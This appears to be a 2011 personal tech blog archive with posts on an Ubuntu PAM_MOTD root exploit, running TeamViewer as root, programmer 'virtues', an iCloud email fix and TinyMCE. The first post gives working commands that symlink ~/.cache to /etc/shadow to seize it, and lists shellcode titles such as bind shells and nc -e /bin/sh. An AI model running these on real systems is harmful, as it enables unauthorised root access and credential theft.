Thursday, December 29, 2011

Ubuntu root access

The PAM_MOTD exploit for Ubuntu is still not patched…

rm -rf ~/.cache;
ln -s /etc/shadow ~/.cache;
ssh localhost (trigger pam_motd by re-logging in and you’ll own /etc/shadow)



In a recent thread is was suggested that Linux was as vulnerable as Windows is and as proof a list of exploits were given that were published on almost the same day as the discussion. Here is the list that was given:
Quote

2011-07-08 Ubuntu PAM MOTD File Tampering (Privilege Escalation)
2011-07-05 linux/x86 polymorphic Drop suid shell root /tmp/.hiddenshell 161 bytes
2011-07-05 linux/x86 bind sh@64533 97 bytes
2011-07-05 linux/x86 lynx polymorphic shellcode 84 bytes
2011-07-05 linux/x86 setreuid(0,0) execve(“/bin/sh”,NULL,NULL) encoded 62 bytes
2011-07-05 linux/x86 /proc/sys/kernel/randomize_va_space SUB encoded 111 bytes
2011-07-05 linux/x86 bind port to 6678 XOR encoded polymorphic shellcode 125 bytes
2011-07-05 linux/x86 nc -lp 31337 -e /bin/sh polymorphic shellcode 91 bytes

Cheers,

Ujjwal Soni

Running Teamviewer 6 as root on linux

While attempting to run teamviewer 6 on BT5, as usual, I got the error:

Error: TeamViewer must not be executed as root!

so the solution is simple

root@bt:~# cd /opt/teamviewer/teamviewer/6/bin/
root@bt:/opt/teamviewer/teamviewer/6/bin# gedit wrapper

then edit the file as

and instead of “die” just replace that with “echo”. This way it would run and every time remind you of security issues as well.


function validate_user()
{
local userid=$(id -u)

if [ $userid = 0 ] ; then
echo “TeamViewer must not be executed as root!”
fi
}

or simply just uncomment the whole if – fi structure.

Cheers!

Ujjwal Soni

Tuesday, December 27, 2011

The 3 virtues of a great programmer

1. Laziness - The quality that makes you go to great effort to reduce overall energy expenditure. It makes you write labor-saving programs that other people will find useful, and document what you wrote so you don't have to answer so many questions about it. Hence, the first great virtue of a programmer. Also hence, this book. See also impatience and hubris.

2. Impatience - The anger you feel when the computer is being lazy. This makes you write programs that don't just react to your needs, but actually anticipate them. Or at least pretend to. Hence, the second great virtue of a programmer. See also laziness and hubris.

3. Hubris - Excessive pride, the sort of thing Zeus zaps you for. Also the quality that makes you write (and maintain) programs that other people won't want to say bad things about. Hence, the third great virtue of a programmer. See also laziness and impatience.

Source : wikipedia

Cheers,

Ujjwal Soni

Monday, December 12, 2011

How to Solve Apple iCloud Verification Email Problem

Apple recently launched its cloud storage service, iCloud. When I tried setting up iCloud on my iPhone4, I was stuck with the verification email problem. The set up wizard kept asking for iCloud email verification but I couldn’t find any option to send or resend iCloud verification email to my email address so that I can verify it. On further research I found that Apple has changed the way it handles Apple ID. Your email address and Apple ID now have to be same; this is unlike how Apple used to handle Apple ID and email address. Till now you could create multiple Apple IDs with one email address or, in other words, a single email address could have been associated with multiple Apple IDs. This got me to the root of the problem why I was not receiving the iCloud verification email. If you are facing the same problem, please follow the steps below to receive iCloud verification email:

1. Go to https://appleid.apple.com/

2. Click on “Find out” link under “Not sure if you have an Apple ID?”



3. Fill out your first name, last name and the email address that you want to use for receiving iCloud verification email.

4. On the next screen, select “Email Authentication” option and click “Next”.

5. Now, go to your Email Inbox and you will find an email from Apple on how to reset the Apple ID password. Click on the “Reset your Apple ID password” link in the email.

6. You will be shown more than one Apple IDs that are associated with your email address.


7. Now, choose the Apple ID that you would NOT like to use for receiving iCloud verification email and click “Next”.

8. Reset the password for this account by providing a new password.

9. Login to Apple ID by visiting https://appleid.apple.com/ and clicking “Manage your account” link. Use the Apple ID that you would NOT like to use for receiving iCloud verification email and the password that you had just set.

10. Click on “Edit” link under “Primary Email Address” section, provide a new email address. Click “Save”.

11. Click Sign Out.

Once you have changed the email address for the Apple ID that you would NOT like to use for receiving iCloud verification email, it’s time to set things right in the Apple ID that you would like to use for iCloud services. Just log in to your account https://appleid.apple.com/with Apple ID that you would like to use for receiving iCloud verification email. You should now see the link to resend verification email under your email address. Click on that link, confirm your email address and you will be all set to use iCloud.

Friday, December 9, 2011

TinyMCE Text Area

Hi All,

Recently i was preparing an application which was based on JSP/Struts, i had a requirement to implement custom font, color selection for each text area on the screen (the screen had multiple text-areas), i found a cool script which allows me to implement visual effects to my text areas, TinyMCE is a platform independent web based Javascript HTML WYSIWYG editor control released as Open Source under LGPL by Moxiecode Systems.

http://www.tinymce.com

Its very easy and fast to implement..:)

Thanks,

Ujjwal Soni